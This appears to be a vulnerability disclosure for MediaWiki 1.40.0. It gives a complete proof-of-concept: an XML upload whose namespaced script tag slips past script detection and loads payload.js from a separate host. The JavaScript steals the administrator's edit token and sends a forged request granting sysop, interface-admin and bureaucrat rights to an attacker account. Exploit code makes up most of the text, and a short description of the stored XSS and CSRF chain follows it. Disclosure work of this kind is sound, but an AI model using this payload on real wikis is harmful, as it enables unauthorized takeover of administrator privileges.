https://fluidattacks.com/advisories/blondie/ (behind login)
Reported by Carlos Bello, tested against MW 1.40.0
```name=exploit.xml,lang=xml
<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="http://localhost:7777/payload.js">
</x:script>
```
```name=payload.js,lang=js
var token = "";
fetch('http://localhost:8080/mediawiki-1.40.0/index.php?title=Special%3AUserRights&user=Hacker', {
credentials: 'include'
})
.then(response => response.text())
.then(html => {
const parser = new DOMParser();
const doc = parser.parseFromString(html, 'text/html');
token = doc.getElementsByName('wpEditToken')[0].value;
// Llamar a la segunda solicitud POST después de obtener el token
return fetch('http://localhost:8080/mediawiki-1.40.0/index.php/Special:UserRights', {
method: 'POST',
credentials: 'include',
headers: {'Content-Type': 'application/x-www-form-urlencoded'},
body: 'user=Hacker&wpEditToken=' + encodeURIComponent(token) + '&conflictcheck-originalgroups=&wpExpiry-bot=infinite&wpExpiry-bot-other=&wpGroup-sysop=1&wpExpiry-sysop=infinite&wpExpiry-sysop-other=&wpGroup-interface-admin=1&wpExpiry-interface-admin=infinite&wpExpiry-interface-admin-other=&wpGroup-bureaucrat=1&wpExpiry-bureaucrat=infinite&wpExpiry-bureaucrat-other=&wpExpiry-suppress=infinite&wpExpiry-suppress-other=&user-reason=&saveusergroups=Save+user+groups'
});
})
.then(response => {
console.log('Respuesta:', response);
})
.catch(error => {
console.error('Error:', error);
});
```
>Description
>Mediawiki v1.40.0 does not validate namespaces used in XML files. Therefore, if the instance administrator allows XML file uploads, a remote attacker with a low-privileged user account can use this exploit to become an administrator by sending a malicious link to the instance administrator.
>
>Vulnerability
>In Mediawiki v1.40.0, an authenticated remote attacker can escalate his privileges through a Stored XSS. Thanks to this, we can perform a CSRF on an administrative account to escalate the privileges of an arbitrary account.
>
>The Stored XSS is caused by MediaWiki v1.40.0 not validating the namespaces used in XML files. Thanks to this we can bypass the script detection security controls.